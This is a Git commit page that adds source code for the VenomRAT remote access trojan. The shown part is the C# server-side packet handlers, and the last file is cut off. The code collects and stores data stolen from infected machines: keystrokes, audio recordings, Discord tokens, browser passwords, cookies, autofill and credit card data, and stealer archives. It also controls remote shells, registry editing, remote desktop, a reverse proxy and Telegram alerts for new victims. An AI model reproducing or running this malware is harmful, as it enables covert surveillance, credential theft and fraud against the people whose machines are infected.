kohvip/VenomRat-SourceCode
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

VenomRat

Browse Source
This commit is contained in:
Anonymous
2023-07-29 23:37:10 +05:30
parent c6c629437c
commit 85f5411b6e
158 changed files with 220479 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

46
Handle_Packet/HandleAudio.cs Normal file
View File

@@ -0,0 +1,46 @@
using System;
using System.Drawing;
using System.IO;
using System.Threading.Tasks;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
namespace Server.Handle_Packet;
public class HandleAudio
{
public async void SaveAudio(Clients client, MsgPack unpack_msgpack)
{
try
{
FormAudio formAudio = (FormAudio)Application.OpenForms["Audio Recorder:" + unpack_msgpack.ForcePathObject("Hwid").GetAsString()];
if (unpack_msgpack.ForcePathObject("Close").GetAsString() == "true")
{
formAudio.btnStartStopRecord.Text = "Start Recording";
formAudio.btnStartStopRecord.Enabled = true;
client.Disconnected();
return;
}
formAudio.btnStartStopRecord.Text = "Start Recording";
formAudio.btnStartStopRecord.Enabled = true;
string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "SaveAudio");
if (!Directory.Exists(fullPath))
{
Directory.CreateDirectory(fullPath);
}
await Task.Run(delegate
{
byte[] asBytes = unpack_msgpack.ForcePathObject("WavFile").GetAsBytes();
File.WriteAllBytes(fullPath + "//" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".wav", asBytes);
});
new HandleLogs().Addmsg("Client " + client.Ip + " recording successfile located @ ClientsFolder/" + unpack_msgpack.ForcePathObject("Hwid").AsString + "/SaveAudio", Color.Purple);
client.Disconnected();
}
catch (Exception ex)
{
new HandleLogs().Addmsg("Save recorded file fail " + ex.Message, Color.Red);
}
}
}

38
Handle_Packet/HandleDiscordRecovery.cs Normal file
View File

@@ -0,0 +1,38 @@
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
namespace Server.Handle_Packet;
public class HandleDiscordRecovery
{
public HandleDiscordRecovery(Clients client, MsgPack unpack_msgpack)
{
try
{
string text = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "Discord");
string asString = unpack_msgpack.ForcePathObject("Tokens").AsString;
if (!string.IsNullOrWhiteSpace(asString))
{
if (!Directory.Exists(text))
{
Directory.CreateDirectory(text);
}
File.WriteAllText(text + "\\Tokens_" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".txt", asString.Replace("\n", Environment.NewLine));
new HandleLogs().Addmsg("Client " + client.Ip + " discord recovery successfile located @ ClientsFolder \\ " + unpack_msgpack.ForcePathObject("Hwid").AsString + " \\ Discord", Color.Purple);
}
else
{
new HandleLogs().Addmsg("Client " + client.Ip + " discord recovery error", Color.MediumPurple);
}
client?.Disconnected();
}
catch (Exception ex)
{
new HandleLogs().Addmsg(ex.Message, Color.Red);
}
}
}

250
Handle_Packet/HandleFileManager.cs Normal file
View File

File diff suppressed because one or more lines are too long

35
Handle_Packet/HandleFileSearcher.cs Normal file
View File

@@ -0,0 +1,35 @@
using System;
using System.Drawing;
using System.IO;
using System.Threading.Tasks;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
namespace Server.Handle_Packet;
public class HandleFileSearcher
{
public async void SaveZipFile(Clients client, MsgPack unpack_msgpack)
{
try
{
string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "FileSearcher");
if (!Directory.Exists(fullPath))
{
Directory.CreateDirectory(fullPath);
}
await Task.Run(delegate
{
byte[] asBytes = unpack_msgpack.ForcePathObject("ZipFile").GetAsBytes();
File.WriteAllBytes(fullPath + "//" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".zip", asBytes);
});
new HandleLogs().Addmsg("Client " + client.Ip + " File Search successfile located @ ClientsFolder/" + unpack_msgpack.ForcePathObject("Hwid").AsString + "/FileSearcher", Color.Purple);
client.Disconnected();
}
catch (Exception ex)
{
new HandleLogs().Addmsg("File Search error " + ex.Message, Color.Red);
}
}
}

25
Handle_Packet/HandleFun.cs Normal file
View File

@@ -0,0 +1,25 @@
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
namespace Server.Handle_Packet;
public class HandleFun
{
public void Fun(Clients client, MsgPack unpack_msgpack)
{
try
{
FormFun formFun = (FormFun)Application.OpenForms["fun:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formFun != null && formFun.Client == null)
{
formFun.Client = client;
formFun.timer1.Enabled = true;
}
}
catch
{
}
}
}

30
Handle_Packet/HandleInformation.cs Normal file
View File

@@ -0,0 +1,30 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
namespace Server.Handle_Packet;
public class HandleInformation
{
public void AddToInformationList(Clients client, MsgPack unpack_msgpack)
{
try
{
string text = Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.Ip + "\\Information");
string text2 = text + "\\Information.txt";
if (!Directory.Exists(text))
{
Directory.CreateDirectory(text);
}
File.WriteAllText(text2, unpack_msgpack.ForcePathObject("InforMation").AsString);
Process.Start("explorer.exe", text2);
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
}

27
Handle_Packet/HandleKeylogger.cs Normal file
View File

@@ -0,0 +1,27 @@
using System.IO;
using System.Linq;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
namespace Server.Handle_Packet;
internal class HandleKeylogger
{
public HandleKeylogger(Clients client, MsgPack unpack_msgpack)
{
string hwid = unpack_msgpack.ForcePathObject("hwid").GetAsString();
if (Settings.connectedClients.FirstOrDefault((Clients x) => x.info.hwid == hwid) != null)
{
FormTimerKeylog formTimerKeylog = (FormTimerKeylog)Application.OpenForms[hwid + ":TimerKeylog"];
string path = Path.Combine(Application.StartupPath, "ClientsFolder", client.Ip, "online_keylog.log");
string asString = unpack_msgpack.ForcePathObject("log").GetAsString();
File.AppendAllText(path, asString);
if (formTimerKeylog != null && !string.IsNullOrEmpty(asString))
{
formTimerKeylog.AddLog(asString);
}
}
}
}

108
Handle_Packet/HandleListView.cs Normal file
View File

@@ -0,0 +1,108 @@
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Media;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Helper;
using Server.Properties;
namespace Server.Handle_Packet;
public class HandleListView
{
public void HandleMsgPack(Clients client, MsgPack unpack_msgpack)
{
try
{
string asString = unpack_msgpack.ForcePathObject("ClientType").AsString;
_ = unpack_msgpack.ForcePathObject("HWID").AsString;
if (asString == "Normal")
{
AddToListview(client, unpack_msgpack);
TelegramNotify.SendNotify(client.Ip + " connected to VenomRAT!");
}
else if (asString == "Hvnc")
{
LaunchHVNCViewer(client, unpack_msgpack);
}
}
catch
{
}
}
public void LaunchHVNCViewer(Clients client, MsgPack unpack_msgpack)
{
}
public void AddToListview(Clients client, MsgPack unpack_msgpack)
{
try
{
string ip = client.Ip;
lock (Settings.LockBlocked)
{
try
{
if (Settings.Blocked.Contains(client.info.hwid) || Settings.Blocked.Contains(client.Ip))
{
client.Disconnected();
return;
}
}
catch
{
}
}
client.LoadInfo();
string value = client.TcpClient.LocalEndPoint.ToString().Split(':')[1];
List<string> apps = new List<string>(unpack_msgpack.ForcePathObject("apps").AsString.Split(new char[1] { ';' }, StringSplitOptions.RemoveEmptyEntries));
ClientInfo clientInfo = new ClientInfo();
clientInfo.ip = ip;
clientInfo.port = Convert.ToInt32(value);
clientInfo.note = client.info.note;
clientInfo.country = Utils.GetCountryName(ip);
clientInfo.group = unpack_msgpack.ForcePathObject("Group").AsString;
clientInfo.hwid = unpack_msgpack.ForcePathObject("HWID").AsString;
clientInfo.desktopname = unpack_msgpack.ForcePathObject("DesktopName").AsString;
clientInfo.user = unpack_msgpack.ForcePathObject("User").AsString;
clientInfo.cpu = unpack_msgpack.ForcePathObject("CPU").AsString;
clientInfo.gpu = unpack_msgpack.ForcePathObject("GPU").AsString;
clientInfo.ram = unpack_msgpack.ForcePathObject("RAM").AsString;
clientInfo.camera = Convert.ToBoolean(unpack_msgpack.ForcePathObject("Camera").AsString);
clientInfo.os = unpack_msgpack.ForcePathObject("OS").AsString;
clientInfo.version = unpack_msgpack.ForcePathObject("Version").AsString;
clientInfo.admin = unpack_msgpack.ForcePathObject("Admin").AsString.ToLower() != "user";
clientInfo.defender = unpack_msgpack.ForcePathObject("Anti_virus").AsString;
clientInfo.installed = unpack_msgpack.ForcePathObject("Install_ed").AsString;
clientInfo.tooltip = "[Path] " + unpack_msgpack.ForcePathObject("Path").AsString + " " + Environment.NewLine + "[PasteBin] " + unpack_msgpack.ForcePathObject("Paste_bin").AsString;
clientInfo.apps = apps;
ClientInfo clientInfo2 = clientInfo;
clientInfo2.keyparam.content = unpack_msgpack.ForcePathObject("keylogsetting").AsString;
client.info = clientInfo2;
client.LastPing = DateTime.Now;
client.SaveInfo();
Program.mainform.Invoke((MethodInvoker)delegate
{
Program.mainform.AddClient(client);
new HandleLogs().Addmsg("Client " + client.Ip + " connected", Color.Green);
if (TimeZoneInfo.Local.Id == "China Standard Time" && Server.Properties.Settings.Default.Notification)
{
SoundPlayer soundPlayer = new SoundPlayer(Resources.online);
soundPlayer.Load();
soundPlayer.Play();
}
});
}
catch (Exception ex)
{
new HandleLogs().Addmsg(ex.Message ?? "", Color.Black);
}
}
public void Received(Clients client)
{
}
}

34
Handle_Packet/HandleLogs.cs Normal file
View File

@@ -0,0 +1,34 @@
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;
namespace Server.Handle_Packet;
public class HandleLogs
{
public static List<LogMsg> LogMsgs = new List<LogMsg>();
public void Addmsg(string Msg, Color color)
{
try
{
LogMsgs.Insert(0, new LogMsg
{
Time = DateTime.Now.ToLongTimeString(),
Msg = Msg
});
Program.mainform.Invoke((MethodInvoker)delegate
{
lock (Settings.LockListviewLogs)
{
Program.mainform.gridControlLog.BeginUpdate();
Program.mainform.gridControlLog.EndUpdate();
}
});
}
catch
{
}
}
}

30
Handle_Packet/HandleNetstat.cs Normal file
View File

@@ -0,0 +1,30 @@
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
namespace Server.Handle_Packet;
public class HandleNetstat
{
public void GetProcess(Clients client, MsgPack unpack_msgpack)
{
try
{
FormNetstat formNetstat = (FormNetstat)Application.OpenForms["Netstat:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formNetstat != null)
{
if (formNetstat.Client == null)
{
formNetstat.Client = client;
formNetstat.timer1.Enabled = true;
}
string asString = unpack_msgpack.ForcePathObject("Message").AsString;
formNetstat.LoadStates(asString);
}
}
catch
{
}
}
}

31
Handle_Packet/HandlePassword.cs Normal file
View File

@@ -0,0 +1,31 @@
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
namespace Server.Handle_Packet;
internal class HandlePassword
{
public void SavePassword(Clients client, MsgPack unpack_msgpack)
{
try
{
string asString = unpack_msgpack.ForcePathObject("Password").GetAsString();
string text = Path.Combine(Application.StartupPath, "ClientsFolder\\" + unpack_msgpack.ForcePathObject("Hwid").AsString + "\\Password");
if (!Directory.Exists(text))
{
Directory.CreateDirectory(text);
}
File.WriteAllText(text + $"\\Password_{DateTime.Now:MM-dd-yyyy HH;mm;ss}.txt", asString);
new HandleLogs().Addmsg("Client " + client.Ip + " password saved successfile located @ ClientsFolder/" + unpack_msgpack.ForcePathObject("Hwid").AsString + "/Password", Color.Purple);
client.Disconnected();
}
catch (Exception ex)
{
new HandleLogs().Addmsg("Password saved error: " + ex.Message, Color.Red);
}
}
}

36
Handle_Packet/HandlePing.cs Normal file
View File

@@ -0,0 +1,36 @@
using System.Threading;
using MessagePackLib.MessagePack;
using Server.Connection;
namespace Server.Handle_Packet;
public class HandlePing
{
public void Ping(Clients client, MsgPack unpack_msgpack)
{
try
{
MsgPack msgPack = new MsgPack();
msgPack.ForcePathObject("Pac_ket").SetAsString("Po_ng");
ThreadPool.QueueUserWorkItem(client.Send, msgPack.Encode2Bytes());
client.info.activewin = unpack_msgpack.ForcePathObject("Message").AsString;
Program.mainform.UpdateActWin(client);
}
catch
{
}
}
public void Po_ng(Clients client, MsgPack unpack_msgpack)
{
try
{
int num = (int)unpack_msgpack.ForcePathObject("Message").AsInteger;
client.info.ping = $"{num} MS";
Program.mainform.UpdatePing(client);
}
catch
{
}
}
}

37
Handle_Packet/HandleProcessManager.cs Normal file
View File

@@ -0,0 +1,37 @@
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
namespace Server.Handle_Packet;
public class HandleProcessManager
{
public class ProcItem
{
public string Name { get; set; }
public string Pid { get; set; }
}
public void GetProcess(Clients client, MsgPack unpack_msgpack)
{
try
{
FormProcessManager formProcessManager = (FormProcessManager)Application.OpenForms["processManager:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formProcessManager != null)
{
if (formProcessManager.Client == null)
{
formProcessManager.Client = client;
formProcessManager.timer1.Enabled = true;
}
string asString = unpack_msgpack.ForcePathObject("Message").AsString;
formProcessManager.LoadList(asString);
}
}
catch
{
}
}
}

50
Handle_Packet/HandleRecovery.cs Normal file
View File

@@ -0,0 +1,50 @@
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Newtonsoft.Json;
using Server.Connection;
using Stealer;
namespace Server.Handle_Packet;
public class HandleRecovery
{
public HandleRecovery(Clients client, MsgPack unpack_msgpack)
{
try
{
string text = Path.Combine(Application.StartupPath, "ClientsFolder", client.Ip, "Recovery");
if (!Directory.Exists(text))
{
Directory.CreateDirectory(text);
}
string asString = unpack_msgpack.ForcePathObject("data").AsString;
if (!Directory.Exists(text))
{
Directory.CreateDirectory(text);
}
BrsInfo brsInfo = JsonConvert.DeserializeObject<BrsInfo>(asString);
File.WriteAllText(text + "\\cookies.json", JsonConvert.SerializeObject(brsInfo.listcookie, Formatting.Indented));
File.WriteAllText(text + "\\passwords.json", JsonConvert.SerializeObject(brsInfo.listps, Formatting.Indented));
File.WriteAllText(text + "\\bookmark.json", JsonConvert.SerializeObject(brsInfo.listbmark, Formatting.Indented));
File.WriteAllText(text + "\\history.json", JsonConvert.SerializeObject(brsInfo.listhist, Formatting.Indented));
File.WriteAllText(text + "\\autofill.json", JsonConvert.SerializeObject(brsInfo.listautofill, Formatting.Indented));
File.WriteAllText(text + "\\credit.json", JsonConvert.SerializeObject(brsInfo.listcredit, Formatting.Indented));
string path = text + "\\cookies.txt";
File.Delete(path);
foreach (Cookie item in brsInfo.listcookie)
{
File.AppendAllText(path, $"{item.domain}\t{item.hostOnly}\t{item.path}\t{item.httpOnly}\t{item.expirationDate}\t{item.name}\t{item.value}\n".Replace("False", "FALSE").Replace("True", "TRUE"));
}
Program.mainform.AddRecoveryClient(client.Ip);
new HandleLogs().Addmsg("Client " + client.Ip + " password recoveried successfile located @ ClientsFolder \\ " + client.Ip + " \\ Recovery", Color.Purple);
client?.Disconnected();
}
catch (Exception ex)
{
new HandleLogs().Addmsg(ex.Message, Color.Red);
}
}
}

178
Handle_Packet/HandleRegManager.cs Normal file
View File

@@ -0,0 +1,178 @@
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Microsoft.Win32;
using ProtoBuf;
using Server.Connection;
using Server.Forms;
using Server.Helper;
namespace Server.Handle_Packet;
internal class HandleRegManager
{
public void RegManager(Clients client, MsgPack unpack_msgpack)
{
try
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "setClient":
{
FormRegistryEditor formRegistryEditor4 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor4 != null && formRegistryEditor4.Client == null)
{
client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
formRegistryEditor4.Client = client;
formRegistryEditor4.timer1.Enabled = true;
}
break;
}
case "CreateKey":
{
FormRegistryEditor formRegistryEditor8 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor8 != null)
{
string asString15 = unpack_msgpack.ForcePathObject("ParentPath").AsString;
byte[] asBytes2 = unpack_msgpack.ForcePathObject("Match").GetAsBytes();
formRegistryEditor8.CreateNewKey(asString15, DeSerializeMatch(asBytes2));
}
break;
}
case "LoadKey":
{
FormRegistryEditor formRegistryEditor9 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor9 != null)
{
string asString16 = unpack_msgpack.ForcePathObject("RootKey").AsString;
byte[] asBytes3 = unpack_msgpack.ForcePathObject("Matches").GetAsBytes();
formRegistryEditor9.AddKeys(asString16, DeSerializeMatches(asBytes3));
}
break;
}
case "DeleteKey":
{
FormRegistryEditor formRegistryEditor6 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor6 != null)
{
string asString10 = unpack_msgpack.ForcePathObject("ParentPath").AsString;
string asString11 = unpack_msgpack.ForcePathObject("KeyName").AsString;
formRegistryEditor6.DeleteKey(asString10, asString11);
}
break;
}
case "RenameKey":
{
FormRegistryEditor formRegistryEditor2 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor2 != null)
{
string asString2 = unpack_msgpack.ForcePathObject("rootKey").AsString;
string asString3 = unpack_msgpack.ForcePathObject("oldName").AsString;
string asString4 = unpack_msgpack.ForcePathObject("newName").AsString;
formRegistryEditor2.RenameKey(asString2, asString3, asString4);
}
break;
}
case "CreateValue":
{
FormRegistryEditor formRegistryEditor7 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor7 != null)
{
string asString12 = unpack_msgpack.ForcePathObject("keyPath").AsString;
string asString13 = unpack_msgpack.ForcePathObject("Kindstring").AsString;
string asString14 = unpack_msgpack.ForcePathObject("newKeyName").AsString;
RegistryValueKind kind = RegistryValueKind.None;
switch (asString13)
{
case "-1":
kind = RegistryValueKind.None;
break;
case "0":
kind = RegistryValueKind.Unknown;
break;
case "1":
kind = RegistryValueKind.String;
break;
case "2":
kind = RegistryValueKind.ExpandString;
break;
case "3":
kind = RegistryValueKind.Binary;
break;
case "4":
kind = RegistryValueKind.DWord;
break;
case "7":
kind = RegistryValueKind.MultiString;
break;
case "11":
kind = RegistryValueKind.QWord;
break;
}
RegistrySeeker.RegValueData regValueData = new RegistrySeeker.RegValueData();
regValueData.Name = asString14;
regValueData.Kind = kind;
regValueData.Data = new byte[0];
formRegistryEditor7.CreateValue(asString12, regValueData);
}
break;
}
case "DeleteValue":
{
FormRegistryEditor formRegistryEditor5 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor5 != null)
{
string asString8 = unpack_msgpack.ForcePathObject("keyPath").AsString;
string asString9 = unpack_msgpack.ForcePathObject("ValueName").AsString;
formRegistryEditor5.DeleteValue(asString8, asString9);
}
break;
}
case "RenameValue":
{
FormRegistryEditor formRegistryEditor3 = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor3 != null)
{
string asString5 = unpack_msgpack.ForcePathObject("keyPath").AsString;
string asString6 = unpack_msgpack.ForcePathObject("OldValueName").AsString;
string asString7 = unpack_msgpack.ForcePathObject("NewValueName").AsString;
formRegistryEditor3.RenameValue(asString5, asString6, asString7);
}
break;
}
case "ChangeValue":
{
FormRegistryEditor formRegistryEditor = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formRegistryEditor != null)
{
string asString = unpack_msgpack.ForcePathObject("keyPath").AsString;
byte[] asBytes = unpack_msgpack.ForcePathObject("Value").GetAsBytes();
formRegistryEditor.ChangeValue(asString, DeSerializeRegValueData(asBytes));
}
break;
}
}
}
catch
{
}
}
public static RegistrySeeker.RegSeekerMatch[] DeSerializeMatches(byte[] bytes)
{
using MemoryStream source = new MemoryStream(bytes);
return Serializer.Deserialize<RegistrySeeker.RegSeekerMatch[]>((Stream)source);
}
public static RegistrySeeker.RegSeekerMatch DeSerializeMatch(byte[] bytes)
{
using MemoryStream source = new MemoryStream(bytes);
return Serializer.Deserialize<RegistrySeeker.RegSeekerMatch>((Stream)source);
}
public static RegistrySeeker.RegValueData DeSerializeRegValueData(byte[] bytes)
{
using MemoryStream source = new MemoryStream(bytes);
return Serializer.Deserialize<RegistrySeeker.RegValueData>((Stream)source);
}
}

72
Handle_Packet/HandleRemoteDesktop.cs Normal file
View File

@@ -0,0 +1,72 @@
using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
using Server.Helper;
namespace Server.Handle_Packet;
public class HandleRemoteDesktop
{
public void Capture(Clients client, MsgPack unpack_msgpack)
{
try
{
FormRemoteDesktop formRemoteDesktop = (FormRemoteDesktop)Application.OpenForms["RemoteDesktop:" + unpack_msgpack.ForcePathObject("ID").AsString];
try
{
if (formRemoteDesktop != null)
{
if (formRemoteDesktop.Client == null)
{
formRemoteDesktop.Client = client;
formRemoteDesktop.labelWait.Visible = false;
formRemoteDesktop.timer1.Start();
byte[] asBytes = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
Bitmap bitmap = formRemoteDesktop.decoder.DecodeData(new MemoryStream(asBytes));
formRemoteDesktop.rdSize = bitmap.Size;
Convert.ToInt32(unpack_msgpack.ForcePathObject("Screens").GetAsInteger());
}
byte[] asBytes2 = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
lock (formRemoteDesktop.syncPicbox)
{
using (MemoryStream inStream = new MemoryStream(asBytes2))
{
Bitmap bitmap2 = (Bitmap)(formRemoteDesktop.GetImage = formRemoteDesktop.decoder.DecodeData(inStream));
formRemoteDesktop.rdSize = bitmap2.Size;
}
formRemoteDesktop.pictureBox1.Image = formRemoteDesktop.GetImage;
formRemoteDesktop.FPS++;
if (formRemoteDesktop.sw.ElapsedMilliseconds >= 1000)
{
string[] obj = new string[10] { "RemoteDesktop:", client.ID, " FPS:", null, null, null, null, null, null, null };
int fPS = formRemoteDesktop.FPS;
obj[3] = fPS.ToString();
obj[4] = " Screen:";
obj[5] = formRemoteDesktop.GetImage.Width.ToString();
obj[6] = " x ";
obj[7] = formRemoteDesktop.GetImage.Height.ToString();
obj[8] = " Size:";
obj[9] = Methods.BytesToString(asBytes2.Length);
formRemoteDesktop.Text = string.Concat(obj);
formRemoteDesktop.FPS = 0;
formRemoteDesktop.sw = Stopwatch.StartNew();
}
return;
}
}
client.Disconnected();
}
catch (Exception)
{
}
}
catch
{
}
}
}

14
Handle_Packet/HandleReportWindow.cs Normal file
View File

@@ -0,0 +1,14 @@
using System.Drawing;
using Server.Connection;
using Server.Properties;
namespace Server.Handle_Packet;
public class HandleReportWindow
{
public HandleReportWindow(Clients client, string title)
{
new HandleLogs().Addmsg("Client " + client.Ip + " opened [" + title + "]", Color.Blue);
_ = Server.Properties.Settings.Default.Notification;
}
}

185
Handle_Packet/HandleReverseProxy.cs Normal file
View File

@@ -0,0 +1,185 @@
#define TRACE
using System;
using System.Diagnostics;
using System.Threading;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Newtonsoft.Json;
using Server.Connection;
using Server.Forms;
using Server.ReverseProxy;
namespace Server.Handle_Packet;
public class HandleReverseProxy
{
private readonly ReverseProxyServer _socksServer = new ReverseProxyServer();
public Clients CommunicationClient;
public FormReverseProxy ProxyForm
{
get
{
if (CommunicationClient == null)
{
return null;
}
string name = "Reverse Proxy : " + CommunicationClient.info.hwid;
FormReverseProxy formReverseProxy = (FormReverseProxy)Application.OpenForms[name];
if (formReverseProxy == null)
{
FormReverseProxy formReverseProxy2 = new FormReverseProxy();
formReverseProxy2.Name = name;
formReverseProxy2.Text = "Reverse Proxy for " + CommunicationClient.Ip + " (" + CommunicationClient.info.hwid + ")";
formReverseProxy = formReverseProxy2;
}
return formReverseProxy;
}
}
public void StartReverseProxyServer(ushort port)
{
_socksServer.OnConnectionEstablished += socksServer_onConnectionEstablished;
_socksServer.OnUpdateConnection += socksServer_onUpdateConnection;
_socksServer.StartServer(CommunicationClient, port);
}
public void StopReverseProxyServer()
{
_socksServer.Stop();
_socksServer.OnConnectionEstablished -= socksServer_onConnectionEstablished;
_socksServer.OnUpdateConnection -= socksServer_onUpdateConnection;
}
private void socksServer_onConnectionEstablished(ReverseProxyClient proxyClient)
{
if (ProxyForm == null)
{
return;
}
new Thread((ThreadStart)delegate
{
Program.mainform.Invoke((MethodInvoker)delegate
{
ProxyForm.OnReport(_socksServer.OpenConnections);
});
}).Start();
}
private void socksServer_onUpdateConnection(ReverseProxyClient proxyClient)
{
if (ProxyForm == null)
{
return;
}
new Thread((ThreadStart)delegate
{
Program.mainform.Invoke((MethodInvoker)delegate
{
ProxyForm.OnReport(_socksServer.OpenConnections);
});
}).Start();
}
public void Dispose()
{
Dispose(disposing: true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
{
if (disposing)
{
StopReverseProxyServer();
}
}
public void ExitProxy()
{
try
{
CommunicationClient.Disconnected();
CommunicationClient = null;
StopReverseProxyServer();
}
catch
{
}
}
public void ConnectionEstablised(Clients client)
{
_ = "Reverse Proxy : " + client.info.hwid;
CommunicationClient = client;
Program.mainform.Invoke((MethodInvoker)delegate
{
if (ProxyForm != null)
{
ProxyForm.ShowDialog();
}
});
}
public void ConnectionResponse(ReverseProxyConnectResponse msg)
{
_socksServer.GetClientByConnectionId(msg.ConnectionId)?.HandleCommandResponse(msg);
if (msg.IsConnected)
{
Trace.WriteLine($"Server: Connected to {msg.HostName}:{msg.RemotePort}");
}
}
public void DataArrived(ReverseProxyData msg)
{
_socksServer.GetClientByConnectionId(msg.ConnectionId)?.SendToClient(msg.Data);
}
public void Disconnected(ReverseProxyDisconnect msg)
{
_socksServer.GetClientByConnectionId(msg.ConnectionId)?.Disconnect();
}
public void Execute(Clients client, MsgPack unpack_msgpack)
{
try
{
_ = unpack_msgpack.ForcePathObject("Hwid").AsString;
ReverseProxyCommands reverseProxyCommands = (ReverseProxyCommands)unpack_msgpack.ForcePathObject("type").AsInteger;
string asString = unpack_msgpack.ForcePathObject("json").AsString;
switch (reverseProxyCommands)
{
case ReverseProxyCommands.INIT:
ConnectionEstablised(client);
break;
case ReverseProxyCommands.CONNECTRESPONSE:
{
ReverseProxyConnectResponse msg3 = JsonConvert.DeserializeObject<ReverseProxyConnectResponse>(asString);
ConnectionResponse(msg3);
break;
}
case ReverseProxyCommands.DATA:
{
ReverseProxyData msg2 = JsonConvert.DeserializeObject<ReverseProxyData>(asString);
DataArrived(msg2);
break;
}
case ReverseProxyCommands.DISCONNECT:
{
ReverseProxyDisconnect msg = JsonConvert.DeserializeObject<ReverseProxyDisconnect>(asString);
Disconnected(msg);
break;
}
}
}
catch
{
}
}
public void CloseConnection(int index)
{
_socksServer.KillConnection(index);
}
}

25
Handle_Packet/HandleShell.cs Normal file
View File

@@ -0,0 +1,25 @@
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
using Server.Forms;
namespace Server.Handle_Packet;
public class HandleShell
{
public HandleShell(MsgPack unpack_msgpack, Clients client)
{
FormShell formShell = (FormShell)Application.OpenForms["shell:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (formShell != null)
{
if (formShell.Client == null)
{
formShell.Client = client;
formShell.timer1.Enabled = true;
}
formShell.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("ReadInput").AsString);
formShell.richTextBox1.SelectionStart = formShell.richTextBox1.TextLength;
formShell.richTextBox1.ScrollToCaret();
}
}
}

66
Handle_Packet/HandleStealer.cs Normal file
View File

@@ -0,0 +1,66 @@
using System;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
using MessagePackLib.MessagePack;
using Server.Connection;
namespace Server.Handle_Packet;
public class HandleStealer
{
public static void RecursiveDelete(string path)
{
if (!Directory.Exists(path))
{
return;
}
string[] files = Directory.GetFiles(path);
foreach (string path2 in files)
{
try
{
File.Delete(path2);
}
catch
{
}
}
files = Directory.GetDirectories(path);
for (int i = 0; i < files.Length; i++)
{
RecursiveDelete(files[i]);
}
}
public void SaveData(Clients client, MsgPack unpack_msgpack)
{
try
{
client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
string text = Path.Combine("ClientsFolder", client.Ip, "VenomStealer");
string text2 = Path.Combine(Application.StartupPath, "ClientsFolder", client.Ip, "VenomStealer");
if (!Directory.Exists(text2))
{
Directory.CreateDirectory(text2);
}
string path = text2 + "\\Logs.txt";
string asString = unpack_msgpack.ForcePathObject("info").AsString;
File.WriteAllText(path, asString);
byte[] asBytes = unpack_msgpack.ForcePathObject("zip").GetAsBytes();
string path2 = text2 + "\\VenomSteal.zip";
if (File.Exists(path2))
{
File.Delete(path2);
}
File.WriteAllBytes(path2, asBytes);
new HandleLogs().Addmsg("GrabData from " + client.Ip + " is Saved to " + text + "!", Color.Blue);
Program.mainform.AddGrabClient(client.Ip);
client?.Disconnected();
}
catch (Exception ex)
{
